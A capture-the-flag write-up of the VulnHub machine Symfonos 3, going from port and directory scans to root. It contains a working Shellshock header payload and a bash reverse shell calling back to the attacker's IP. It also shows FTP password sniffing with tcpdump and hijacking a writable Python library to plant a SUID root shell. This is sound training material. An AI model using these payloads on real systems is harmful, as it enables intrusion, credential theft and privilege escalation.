Recon

NMAP Complete Scan

# Nmap 7.92 scan initiated Fri Feb  4 03:37:59 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/Symfonos-3/192.168.110.12/scans/_full_tcp_nmap.txt -oX /root/vulnHub/Symfonos-3/192.168.110.12/scans/xml/_full_tcp_nmap.xml 192.168.110.12
adjust_timeouts2: packet supposedly had rtt of -531024 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -531024 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -531015 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -531015 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -531756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -531756 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -529653 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -529653 microseconds.  Ignoring time.
Nmap scan report for 192.168.110.12
Host is up, received arp-response (0.00061s latency).
Scanned at 2022-02-04 03:38:00 +08 for 17s
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 ProFTPD 1.3.5b
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 cd:64:72:76:80:51:7b:a8:c7:fd:b2:66:fa:b6:98:0c (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDK0oaDrdLT7VSjY1FV9llkwWSCIm/t8s6PnjgkyBm01dLPZwMPupDHRDs0hTAPu8ULa5FmXEc9JnHYQQQ07ZACw1RmDEyWWtkOY90lVHfFEIv6LCviLpzw/qW9o6RCmu/cV24FvMzU7tjWedOu21ZXGQgMSq2HfQWV2Hr5+mRbUFeh6HIBYd7v2tbATO+dPii3cF52KgD9/KgSZX2Mj4ZK/JW8E7c3kZPhtqAfrg7nPuhl0T02uk1mD6PIRqNag1SHYWRhvfIb3rP2vbSNAxpzwPp31u5+Iee7c3NBxpqOFFw143TzwMO+CRwdaJWI9dbsLoNvJYn96YjmPO0Y86Bl
|   256 74:e5:9a:5a:4c:16:90:ca:d8:f7:c7:78:e7:5a:86:81 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEogzxRYvlNzB6cgNCHP6IB3h5LWSrGWbI1c46IQ2JiPR2Bfo04xA+nGxuGekG3WmjkK2dC5u+xsCR6ihBXDpjU=
|   256 3c:e4:0b:b9:db:bf:01:8a:b7:9c:42:bc:cb:1e:41:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHZVA1Masiw/GOsw3RTrujE9a9BtwyxHF9w53yqKs5RG
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
MAC Address: 08:00:27:6F:72:9C (Oracle VirtualBox virtual NIC)
OS fingerprint not ideal because: maxTimingRatio (1.404000e+00) is greater than 1.4
Aggressive OS guesses: Linux 3.13 (96%), Linux 3.2 - 4.9 (96%), Linux 3.16 - 4.6 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 2.6.32 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 3.10 - 4.11 (91%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=2/4%OT=21%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=61FC2F29%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=8)
SEQ(TI=Z%CI=Z%II=I%TS=8)
OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=O%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)

Uptime guess: 198.839 days (since Tue Jul 20 07:30:14 2021)
Network Distance: 1 hop
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms 192.168.110.12

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  4 03:38:17 2022 -- 1 IP address (1 host up) scanned in 19.80 seconds

TCP/21 (FTP)

Anonymous access is disabled

TCP/80 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/Symfonos-3]
└─# ffuf -u http://$ip/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php'

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.12/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________
cgi-bin/.php            [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/                [Status: 403, Size: 279, Words: 20, Lines: 10]
cgi-bin/.html           [Status: 403, Size: 279, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 279, Words: 20, Lines: 10]
gate                    [Status: 301, Size: 315, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 241, Words: 24, Lines: 23]
index.html              [Status: 200, Size: 241, Words: 24, Lines: 23]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
:: Progress: [18460/18460] :: Job [1/1] :: 8806 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

cgi-bin/
gate
index.html

Initial Foothold

TCP/80 (HTTP) - Shell Shock

View enumerated directories
- index.html
  - “Can you bust the underworld”
- gate
- cgi-bin/
  - Forbidden
Fuzz for more directories in gate/
- directory-2.3-medium, found nothing
- common.txt, found nothing

Fuzz for more directories in cgi-bin/

 ┌──(root💀kali)-[~/vulnHub/Symfonos-3]
 └─# ffuf -u http://$ip/cgi-bin/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.html,.txt,.cgi,.php'

         /'___\  /'___\           /'___\       
        /\ \__/ /\ \__/  __  __  /\ \__/       
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
          \ \_\   \ \_\  \ \____/  \ \_\       
           \/_/    \/_/   \/___/    \/_/       

        v1.3.1 Kali Exclusive <3
 ________________________________________________

  :: Method           : GET
  :: URL              : http://192.168.110.12/cgi-bin/FUZZ
  :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  :: Extensions       : .html .txt .cgi .php 
  :: Follow redirects : false
  :: Calibration      : false
  :: Timeout          : 10
  :: Threads          : 40
  :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 ________________________________________________
                         [Status: 403, Size: 279, Words: 20, Lines: 10]
 .html                   [Status: 403, Size: 279, Words: 20, Lines: 10]
 .php                    [Status: 403, Size: 279, Words: 20, Lines: 10]
 underworld              [Status: 200, Size: 65, Words: 14, Lines: 2]
 :: Progress: [1102800/1102800] :: Job [1/1] :: 5799 req/sec :: Duration: [0:03:17] :: Errors: 0 ::

underworld

Proceed to underworld
- A cgi-bin script is executed, could be vulnerable to Shellshock

Determine whether the webserver is susceptible to shellshock

 ┌──(root💀kali)-[~/vulnHub/Symfonos-3]
 └─# curl -A "() { :;}; echo Content-Type: text/html; echo; /usr/bin/whoami;" http://$ip/cgi-bin/underworld
 cerberus

Exploited before @ TryHackMe: 0day

Execute reverse shell

 ┌──(root💀kali)-[~/vulnHub/Symfonos-3]
 └─# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.110.4/4444 0>&1' http://$ip/cgi-bin/underworld

Privilege Escalation

Hades - Via Cronjob + TCPDump

Linpeas
1. hades running proftpd
2. cerberus belongs to the pcap group
3. tcpdump is available

Look for proftpd logs

 cerberus@symfonos3:/var/log/proftpd$ cd /var/log
 cerberus@symfonos3:/var/log$ ls -la
 total 2636
 drwxr-xr-x  8 root        root   4096 Jul 20  2019 .
 drwxr-xr-x 12 root        root   4096 Jul 19  2019 ..
 -rw-r--r--  1 root        root  21941 Apr  6  2020 alternatives.log
 drwxr-x---  2 root        adm    4096 Jul 19  2019 apache2
 drwxr-xr-x  2 root        root   4096 Apr  6  2020 apt
 -rw-r-----  1 root        adm  129794 Feb  3 23:18 auth.log
 -rw-------  1 root        utmp   1536 Feb  3 23:06 btmp
 -rw-r-----  1 root        adm  126990 Feb  3 23:14 daemon.log
 -rw-r-----  1 root        adm  194227 Feb  3 21:36 debug
 -rw-r--r--  1 root        root 439846 Apr  6  2020 dpkg.log
 drwxr-s---  2 Debian-exim adm    4096 Feb  3 22:57 exim4
 -rw-r-----  1 root        adm    6850 Feb  3 23:06 fail2ban.log
 -rw-r--r--  1 root        root  32064 Jul 20  2019 faillog
 drwxr-xr-x  3 root        root   4096 Jul 19  2019 installer
 -rw-r-----  1 root        adm  521046 Feb  3 23:02 kern.log
 -rw-rw-r--  1 root        utmp 292584 Feb  3 22:36 lastlog
 -rw-r-----  1 root        adm  356263 Feb  3 23:02 messages
 drwxr-xr-x  2 root        root   4096 Jul 20  2019 proftpd
 -rw-r-----  1 root        adm  695870 Feb  3 23:18 syslog
 drwxr-x---  2 root        adm    4096 Apr  6  2020 unattended-upgrades
 -rw-r-----  1 root        adm     354 Jul 20  2019 user.log
 -rw-rw-r--  1 root        utmp 110592 Feb  3 23:18 wtmp

proftpd directory

View files in proftpd

 cerberus@symfonos3:/var/log$ cd proftpd/
 cerberus@symfonos3:/var/log/proftpd$ ls -la
 total 68
 drwxr-xr-x 2 root root  4096 Jul 20  2019 .
 drwxr-xr-x 8 root root  4096 Jul 20  2019 ..
 -rw-r----- 1 root root     0 Jul 20  2019 controls.log
 -rw-r----- 1 root root 50145 Feb  3 23:18 proftpd.log
 -rw-r--r-- 1 root root  1004 Jul 20  2019 xferlog
 cerberus@symfonos3:/var/log/proftpd$ 

only xferlog is readable

View xferlog

 cerberus@symfonos3:/var/log/proftpd$ cat xferlog 
 Sat Jul 20 03:43:47 2019 0 localhost 251 /home/hades/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 03:44:30 2019 0 localhost 251 /home/hades/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 03:49:42 2019 0 localhost 251 /srv/ftp/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 03:58:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 03:59:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:00:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:01:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:02:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:03:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:04:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 Sat Jul 20 04:06:01 2019 0 localhost 0 /opt/client/statuscheck.txt b _ i r hades ftp 0 * c
 cerberus@symfonos3:/var/log/proftpd$ 

Based on the timing, we can tell that statuscheck.txt is being generated every minute
There is probably a cronjob running as root that is generating statuscheck.txt

Sniff processes w/ pspy64 to actually see the cronjob being executed

 cerberus@symfonos3:/tmp$ ./pspy64 
 pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


      ██▓███    ██████  ██▓███ ▓██   ██▓
     ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
     ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
     ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
     ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
     ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
     ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
     ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                    ░           ░ ░     
                                ░ ░     
 ...
 2022/02/04 00:40:02 CMD: UID=0    PID=10519  | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py 
 2022/02/04 00:40:02 CMD: UID=0    PID=10520  | /usr/bin/python2.7 /opt/ftpclient/ftpclient.py 
 2022/02/04 00:40:02 CMD: UID=0    PID=10521  | cp /bin/bash /tmp/rootbash 
 2022/02/04 00:40:02 CMD: UID=0    PID=10522  | 
 2022/02/04 00:40:02 CMD: UID=0    PID=10523  | /usr/sbin/CRON -f 
 2022/02/04 00:40:02 CMD: UID=105  PID=10524  | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root 
 2022/02/04 00:40:02 CMD: UID=1000 PID=10525  | /usr/sbin/exim4 -Mc 1nFsGI-0002jj-38 
 2022/02/04 00:41:01 CMD: UID=0    PID=10526  | /usr/sbin/CRON -f 
 2022/02/04 00:41:01 CMD: UID=0    PID=10527  | /usr/sbin/CRON -f 
 2022/02/04 00:41:01 CMD: UID=0    PID=10528  | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt 
 2022/02/04 00:41:25 CMD: UID=0    PID=10529  | /bin/sh /sbin/dhclient-script 
 2022/02/04 00:41:25 CMD: UID=0    PID=10530  | run-parts --list /etc/dhcp/dhclient-enter-hooks.d 
 2022/02/04 00:41:25 CMD: UID=0    PID=10531  | /bin/sh /sbin/dhclient-script 
 2022/02/04 00:42:01 CMD: UID=0    PID=10533  | /usr/sbin/CRON -f 
 2022/02/04 00:42:01 CMD: UID=0    PID=10532  | /usr/sbin/cron -f 
 2022/02/04 00:42:01 CMD: UID=0    PID=10534  | /usr/sbin/CRON -f 
 2022/02/04 00:42:01 CMD: UID=0    PID=10535  | /usr/sbin/CRON -f 
 2022/02/04 00:42:01 CMD: UID=0    PID=10537  | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt 
 2022/02/04 00:42:01 CMD: UID=0    PID=10536  | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py 
 2022/02/04 00:42:01 CMD: UID=0    PID=10538  | /usr/bin/python2.7 /opt/ftpclient/ftpclient.py 
 2022/02/04 00:42:01 CMD: UID=0    PID=10539  | cp /bin/bash /tmp/rootbash 
 2022/02/04 00:42:01 CMD: UID=0    PID=10540  | sh -c cp /bin/bash /tmp/rootbash; chmod u+s /tmp/rootbash 
 2022/02/04 00:42:01 CMD: UID=0    PID=10541  | /usr/sbin/CRON -f 
 2022/02/04 00:42:01 CMD: UID=105  PID=10542  | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root 
 2022/02/04 00:42:01 CMD: UID=1000 PID=10543  | /usr/sbin/exim4 -Mc 1nFsID-0002k1-7a 

There are actually 2 cronjobs
1. /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
  - Executed every 2 minute
  - ftpclient.py could be accessing FTP, sniffing FTP traffic could reveal passwords
2. /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt
  - Executed every minute

Sniff FTP traffic w/ tcpdump

 # Specify Loopback Interface (127.0.0.1)
 cerberus@symfonos3:/var/log/proftpd$ tcpdump port 21 -i lo 

hades:PTpZTfU4vxgzvRBE

Switch to hades w/ hades:PTpZTfU4vxgzvRBE

Root - Via Cronjob + Python Hijacking

Linpeas
1. hades belongs to the gods group
2. gods group has write access to the entire python library where python modules resides.
Earlier, we used pspy64 to observe system processes, we saw cronjob executing a python script ftpclient.py, since we have write access to the entire /usr/lib directory, we can edit the module ftpclient.py is using, in order to spawn a root shell.
- This is called python hijacking, TryHackMe: Wonderland also has this

View contents of /opt/ftpclient/ftpclient.py

 hades@symfonos3:/srv/ftp$ cat /opt/ftpclient/ftpclient.py
 import ftplib

 ftp = ftplib.FTP('127.0.0.1')
 ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')

 ftp.cwd('/srv/ftp/')

 def upload():
     filename = '/opt/client/statuscheck.txt'
     ftp.storbinary('STOR '+filename, open(filename, 'rb'))
     ftp.quit()

 upload()

ftplib module is imported

View permissions of ftplib

 hades@symfonos3:/srv/ftp$ ls -l /usr/lib/python2.7 | grep ftp
 -rwxrw-r-- 1 root gods  37755 Sep 26  2018 ftplib.py
 -rwxrw-r-- 1 root gods  34438 Jul 19  2019 ftplib.pyc
 hades@symfonos3:/srv/ftp$ 

gods group have write access

Edit ftplib to spawn a root shell

 # Make a backup of ftplib.py
 hades@symfonos3:/usr/lib/python2.7$ cp ftplib.py /tmp/ftplib.py.bak
	
 # Create python script to spawn a root shell
 hades@symfonos3:/usr/lib/python2.7$ nano /tmp/ftplib.py # See Screenshot
	
 # Replace malicious python script w/ actual python script
 hades@symfonos3:/tmp$ cp /tmp/ftplib.py /usr/lib/python2.7/ftplib.py

Wait for cronjob to execute

 hades@symfonos3:/tmp$ ls -l
 total 4988
 -rw-r--r-- 1 hades    hades         76 Feb  4 00:20 ftplib.py
 -rwxr--r-- 1 hades    hades      37755 Feb  4 00:17 ftplib.py.bak
 -rw-r--r-- 1 hades    hades     113360 Feb  3 23:42 hades.out
 -rw-r--r-- 1 cerberus cerberus  113874 Feb  3 22:39 linpeas.out
 -rwxrwxrwx 1 cerberus cerberus  762836 Feb  3 22:38 linpeas.sh
 -rwxr-xr-x 1 cerberus cerberus 3078592 Feb  3 23:33 pspy64
 -rwsr-xr-x 1 root     root      975488 Feb  4 00:24 rootbash # Rootshell
 drwx------ 3 root     root        4096 Feb  3 21:36 systemd-private-32c5effdfe964eecbf53b94cec555765-apache2.service-CbKte3
 drwx------ 3 root     root        4096 Feb  3 21:36 systemd-private-32c5effdfe964eecbf53b94cec555765-systemd-timesyncd.service-8gPZoY
 -rw-r--r-- 1 hades    hades          0 Feb  4 00:18 test
 hades@symfonos3:/tmp$ 

Obtain root shell

 hades@symfonos3:/tmp$ /tmp/rootbash -p

Root Flag

 rootbash-4.2# cd /root
 rootbash-4.2# ls
 proof.txt
 rootbash-4.2# cat proof.txt 

     Congrats on rooting symfonos:3!
                                         _._
                                       _/,__\,
                                    __/ _/o'o
                                  /  '-.___'/  __
                                 /__   /\  )__/_))\
      /_/,   __,____             // '-.____|--'  \\
     e,e / //  /___/|           |/     \/\        \\
     'o /))) : \___\|          /   ,    \/         \\
      -'  \\__,_/|             \/ /      \          \\
              \_\|              \/        \          \\
              | ||              <    '_    \          \\
              | ||             /    ,| /   /           \\
              | ||             |   / |    /\            \\
              | ||              \_/  |   | |             \\
              | ||_______________,'  |__/  \              \\
               \|/_______________\___/______\_             \\
                \________________________     \__           \\        ___
                   \________________________    _\_____      \\ _____/
                      \________________________               \\
         ~~~~~~~        /  ~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~ ~~~~\\~~~~
             ~~~~~~~~~~~~~~    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~    //

     Contact me via Twitter @zayotic to give feedback!

 rootbash-4.2# 

View cronjobs ``` root@symfonos3:/opt# crontab -l @reboot /sbin/dhclient -nw
- - - - /usr/bin/curl –silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt */2 * * * * /usr/bin/python2.7 /opt/ftpclient/ftpclient.py root@symfonos3:/opt# ```

Vulnhub - Symfonos 3